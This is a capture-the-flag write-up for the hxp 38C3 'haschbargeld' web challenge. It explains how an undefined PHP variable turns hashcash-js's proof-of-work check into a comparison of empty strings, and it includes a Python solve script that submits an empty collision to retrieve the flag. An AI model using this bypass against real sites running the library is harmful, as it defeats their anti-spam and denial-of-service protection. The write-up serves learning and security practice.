Table of Contents
- Solved by: @siunam
- Contributor: @ozetta
- 123 solves / 76 points
- Author: @yyyyyyy
- Overall difficulty for me (From 1-10 stars): ★★☆☆☆☆☆☆☆☆
Index page:
When we go to the index page, we are met with an alert box: "we got the setup timed out!" Hmm… No idea what that is.
After clicking off the alert box, we can see that this page has 2 input boxes, a <textarea>
element, and a "Go!" button:
Let's try to submit some random stuff:
Burp Suite HTTP history:
When we clicked the "Go!" button, it'll send a POST request to /post_comment.php
with parameter hc_stamp
, hc_contract
, hc_collision
, username
, comment
, and timeout
Again, no idea what it does. Let's read this web application's source code!
In this challenge, we can download a file:
└> file haschbargeld-b96b408667d332b4.tar.xz
haschbargeld-b96b408667d332b4.tar.xz: XZ compressed data, checksum CRC64
└> tar xvf haschbargeld-b96b408667d332b4.tar.xz
Huh, there's no PHP script files after extracting the tar archieve file?
In the Dockerfile
, it'll run the setup.sh
Bash script file during building the Docker image:
RUN /setup.sh && rm /setup.sh
Let's see what it does!
In the first few lines, it'll create the nginx configuration file. In that config, it sets file makecomment.php
as the index page:
cat >/etc/nginx/sites-enabled/default <<EOF
server {
listen 80 default_server;
listen [::]:80 default_server;
root /var/www/html;
index makecomment.php;
server_name _;
location / {
try_files \$uri \$uri/ =404;
location ~ \.php$ {
include snippets/fastcgi-php.conf;
fastcgi_pass unix:/run/php/php8.2-fpm.sock;
Next, it downloads GitHub repository hashcash-js to /var/www/html/
and switch to commit d967644776e91e37dc45978e801bbf1cddbaaf1c
cd /var/www/html
git init .
git remote add origin 'https://github.com/007/hashcash-js.git'
git fetch origin d967644776e91e37dc45978e801bbf1cddbaaf1c
git checkout d967644776e91e37dc45978e801bbf1cddbaaf1c
After that, it modifies hashcash-js's config file hc_config.php
and hashcash.php
sed -i "s!ThIsIsAtEsT!$(md5sum /flag.txt)!" hc_config.php
sed -i s/12/31/ hc_config.php
sed -i s/60/1/ hashcash.php
The first sed
command is to edit the string ThIsIsAtEsT
to the MD5 hash of the /flag.txt
file. The second one is to edit string 12
to 31
, and the final one is to edit string 60
to 1
Finally, it appends the following PHP code into post_comment.php
cat >>post_comment.php <<EOF
include "hashcash.php";
if (hc_CheckStamp()) {
echo file_get_contents("/flag.txt");
In the above PHP code, if hc_CheckStamp
returns a truthy value (true
) or something that is not empty, we can get the flag.
Hmm… hashcash-js? If we read the README.md
file in that GitHub repository, it says this is a PHP and JavaScript implementation of Hashcash.
Hashcash is a proof-of-work algorithm, which has been used as a denial-of-service counter measure technique in a number of systems. - http://www.hashcash.org/
Also, it is worth noting that this repository hasn't been updated since 2010. So maybe it has some vulnerabilities?
Let's build the Docker image and find out!
For my convenience, I'll mount a new volume between my host to the Docker container's path /var/www/html/
by modifying compose.yml
, so that I can review hashcash-js code better:
# docker compose up
dockerfile: Dockerfile
restart: unless-stopped
- 30788:80
- ./hashcash-js:/var/www/html/
Then run docker compose up --build -d
to build and run the Docker container:
└> cd haschbargeld
└> docker compose up --build -d
After doing so, path /var/www/html/
seems like empty?
└> ls -lah hashcash-js
total 8.0K
drwxr-xr-x 2 root root 4.0K Dec 30 20:14 .
drwx------ 3 siunam siunam 4.0K Dec 30 20:08 ..
Apparently the setup.sh
Bash script didn't execute.
Well, we can just do that manually:
└> docker container list
bbacbab00062 haschbargeld-chall "/bin/sh -c '/etc/in…" 2 minutes ago Up 2 minutes>80/tcp, [::]:30788->80/tcp haschbargeld-chall-1
└> docker exec -it bbacbab00062 /bin/bash
root@bbacbab00062:/# cat >/etc/nginx/sites-enabled/default <<EOF
server {
listen 80 default_server;
listen [::]:80 default_server;
root /var/www/html;
index makecomment.php;
server_name _;
location / {
try_files \$uri \$uri/ =404;
location ~ \.php$ {
include snippets/fastcgi-php.conf;
fastcgi_pass unix:/run/php/php8.2-fpm.sock;
cd /var/www/html
rm -rf *
root@bbacbab00062:/var/www/html# git init .
git remote add origin 'https://github.com/007/hashcash-js.git'
git fetch origin d967644776e91e37dc45978e801bbf1cddbaaf1c
git checkout d967644776e91e37dc45978e801bbf1cddbaaf1c
rm -rf .git
Also the first sed
command seems wrong. We can fix it anyway:
root@bbacbab00062:/var/www/html# sed -i "s/ThIsIsAtEsT/$(md5sum /flag.txt | cut -d ' ' -f1 | tr -d '\n')/" hc_config.php
root@bbacbab00062:/var/www/html# sed -i s/12/31/ hc_config.php
sed -i s/60/1/ hashcash.php
cat >>post_comment.php <<EOF
include "hashcash.php";
if (hc_CheckStamp()) {
echo file_get_contents("/flag.txt");
Now that we setup the local testing environment, let's review hashcash-js!
If we go to hashcat.php
, function hc_CheckStamp
has a lot of validations:
include "hc_config.php";
// check a stamp
// checks validity, expiration, and contract obligations for a stamp
function hc_CheckStamp()
global $hc_contract, $hc_maxcoll, $hc_stampsize;
$validstamp = true;
$stamp = $_POST['hc_stamp'];
$client_con = $_POST['hc_contract'];
$collision = $_POST['hc_collision'];
if($client_con != $hc_contract) $validstamp = false; // valid contract?
if($validstamp) if(strlen($stamp) != $hc_stampsize) $validstamp = false; // valid stamp?
if($validstamp) if(strlen($collision) > $hc_maxcoll) $validstamp = false; // valid collision?
if($validstamp) $validstamp = hc_CheckExpiration($stamp); // stamp expired?
if($validstamp) $validstamp = hc_CheckContract($stamp, $collision, $contract); // collision meets contract?
return $validstamp;
Note: For readability, I removed all the debugging stuff.
Let's go through every single if statements one by one!
In the first to the third if statement, it checks our POST parameter hc_contract
, hc_stamp
's length is equals to variable $hc_contract
, $hc_stampsize
, and hc_collision
's length is less than $hc_maxcoll
which is defined in hc_config.php
if($client_con != $hc_contract) $validstamp = false; // valid contract?
if($validstamp) if(strlen($stamp) != $hc_stampsize) $validstamp = false; // valid stamp?
if($validstamp) if(strlen($collision) > $hc_maxcoll) $validstamp = false; // valid collision?
// user-configurable random string
$hc_salt = "bd62bf9b8eb3c60d92246c3a67efb78c";
// number of bits to collide
$hc_contract = 31;
// maximum length of data to hash
// client can generate 1..$maxcoll characters of data
$hc_maxcoll = 8;
// tolerance, in minutes between stamp generation and expiration
// don't make this too high, CheckPostage() has to calculate $tolerance different hashes
$hc_tolerance = 2;
// size of our hash function output
// in hex numbers - 0x31345 is 5, 0xabc is 3
$hc_stampsize = 8;
So, our POST parameter hc_contract
must be 31
, hc_stamp
's length must be 8
, and hc_collision
's length must be less than 8
In the fourth if statement, it checks whether our stamp is expired or not:
if($validstamp) $validstamp = hc_CheckExpiration($stamp); // stamp expired?
// define generic hash function (currently md5)
function hc_HashFunc($x) { return sprintf("%08x", crc32($x)); }
// hc_CheckExpiration - true = valid, false = expired
function hc_CheckExpiration($a_stamp)
global $hc_salt, $hc_tolerance;
$expired = true;
$tempnow = intval(time() / 1);
for($i = 0; $i < $hc_tolerance; $i++)
if($a_stamp === hc_HashFunc(($tempnow - $i) . $ip . $hc_salt))
$expired = false;
return !($expired);
As you can see, the stamp expiration date can only last for 2 seconds. And the check is done via CRC32 hashing this input: <current_time_minus_$i><our_ip_address><salt>
In the final if statement, it calls function hc_CheckContract
to check the correct proof-of-work values:
if($validstamp) $validstamp = hc_CheckContract($stamp, $collision, $contract); // collision meets contract?
// convert hex numbers to binary strings
function hc_HexInBin($x)
case '0': $ret = '0000'; break;
case '1': $ret = '0001'; break;
case '2': $ret = '0010'; break;
case '3': $ret = '0011'; break;
case '4': $ret = '0100'; break;
case '5': $ret = '0101'; break;
case '6': $ret = '0110'; break;
case '7': $ret = '0111'; break;
case '8': $ret = '1000'; break;
case '9': $ret = '1001'; break;
case 'A': $ret = '1010'; break;
case 'B': $ret = '1011'; break;
case 'C': $ret = '1100'; break;
case 'D': $ret = '1101'; break;
case 'E': $ret = '1110'; break;
case 'F': $ret = '1111'; break;
default: $ret = '0000';
return $ret;
function hc_ExtractBits($hex_string, $num_bits)
$bit_string = "";
$num_chars = ceil($num_bits / 4);
for($i = 0; $i < $num_chars; $i++)
$bit_string .= hc_HexInBin(substr($hex_string, $i, 1));
return substr($bit_string, 0, $num_bits);
// check for collision of $stamp_contract bits for $stamp and $collision
function hc_CheckContract($stamp, $collision, $stamp_contract)
if($stamp_contract >= 32)
return false;
$maybe_sum = hc_HashFunc($collision);
$partone = hc_ExtractBits($stamp, $stamp_contract);
$parttwo = hc_ExtractBits($maybe_sum, $stamp_contract);
return (strcmp($partone, $parttwo) == 0);
In here, it basically checks for CRC32 hash collision between $stamp
and $collision
. If they have collision, it passes the check.
However, if we use an IDE editor, this validation seems broken?
Huh. Since $contract
is not defined in anywhere, how does PHP handle this?
To test this, we can write the following testing PHP script:
function foo($bar) {
└> php test.php
PHP Warning: Undefined variable $doesnt_exist in /home/siunam/ctf/hxp-38C3-CTF/Web/haschbargeld/haschbargeld/test.php on line 6
Huh, it seems like PHP will output a warning, and parse null
to the argument. Average sane PHP quirk
So what will happen when function hc_CheckContract
's argument $stamp_contract
is null
?? Will it return true
function hc_CheckContract($stamp, $collision, $stamp_contract)
if(null >= 32)
return false;
Note: I replaced
In this if statement, NULL
is greater and equals to 32, which will not immediately return:
└> php -a
php > var_dump(null >= 32);
Then, in function hc_ExtractBits
, since the second argument is null
, ceil(null / 4)
will be 0
function hc_ExtractBits($hex_string, $num_bits)
$bit_string = "";
$num_chars = ceil(null / 4);
for($i = 0; $i < $num_chars; $i++)
$bit_string .= hc_HexInBin(substr($hex_string, $i, 1));
return substr($bit_string, 0, null);
function hc_CheckContract($stamp, $collision, $stamp_contract)
$partone = hc_ExtractBits($stamp, null);
$parttwo = hc_ExtractBits($maybe_sum, null);
php > var_dump(ceil(null / 4));
If $num_chars
is 0
, well then $bit_string
will be an empty string, which basically means this function will always return an empty string:
php > var_dump(substr("", 0, null));
string(0) ""
Finally, if $partone
and $parttwo
are empty string, the strcmp
will always return 0
. Therefore, function hc_CheckContract
will always return true
function hc_CheckContract($stamp, $collision, $stamp_contract)
$partone = hc_ExtractBits($stamp, $stamp_contract);
$parttwo = hc_ExtractBits($maybe_sum, $stamp_contract);
return (strcmp($partone, $parttwo) == 0);
php > var_dump(strcmp("", ""));
php > var_dump(0 == 0);
Armed with the above information, as long as we have a valid, not expired stamp, we can get the flag!
How do we get a valid stamp? Well, makecomment.php
will generate one for us:
<?php include "hashcash.php"; ?>
<?php hc_CreateStamp(); ?>
// generate a stamp
function hc_CreateStamp()
global $hc_salt, $hc_contract, $hc_maxcoll;
$now = intval(time() / 1);
// create stamp
// stamp = hash of time (in minutes) . user ip . salt value
$stamp = hc_HashFunc($now . $ip . $hc_salt);
//embed stamp in page
echo "<input type=\"hidden\" name=\"hc_stamp\" id=\"hc_stamp\" value=\"" . $stamp . "\" />\n";
echo "<input type=\"hidden\" name=\"hc_contract\" id=\"hc_contract\" value=\"" . $hc_contract . "\" />\n";
echo "<input type=\"hidden\" name=\"hc_collision\" id=\"hc_collision\" value=\"" . $hc_maxcoll . "\" />\n";
So, to get the flag, we need to:
- Get a valid stamp in
- Send POST parameter
, andhc_collision=<empty_string>
To automate the above steps, I have written the following Python solve script:
#!/usr/bin/env python3
import requests
from bs4 import BeautifulSoup
class Solver:
def __init__(self, baseUrl):
self.baseUrl = baseUrl
self.GET_FLAG_ENDPOINT = f'{self.baseUrl}/post_comment.php'
def getStamp(self):
soup = BeautifulSoup(requests.get(self.baseUrl).text, 'html.parser')
stamp = soup.find('input', attrs={ 'id': 'hc_stamp' }).attrs['value']
return stamp
def getFlag(self, stamp):
data = {
'hc_stamp': stamp,
'hc_contract': '31',
'hc_collision': ''
responseText = requests.post(self.GET_FLAG_ENDPOINT, data=data).text
flag = responseText.split()[-1]
return flag
def solve(self):
stamp = self.getStamp()
print(f'[+] Valid stamp: {stamp}')
flag = self.getFlag(stamp)
print(f'[+] {flag}')
if __name__ == '__main__':
# baseUrl = 'http://localhost:30788' # for local testing
baseUrl = ''
solver = Solver(baseUrl)
└> python3 solve.py
[+] Valid stamp: 150f8cff
[+] hxp{H45H_w4s_s0_C45H}
- Flag:
What we've learned:
- PHP undefined variable quirk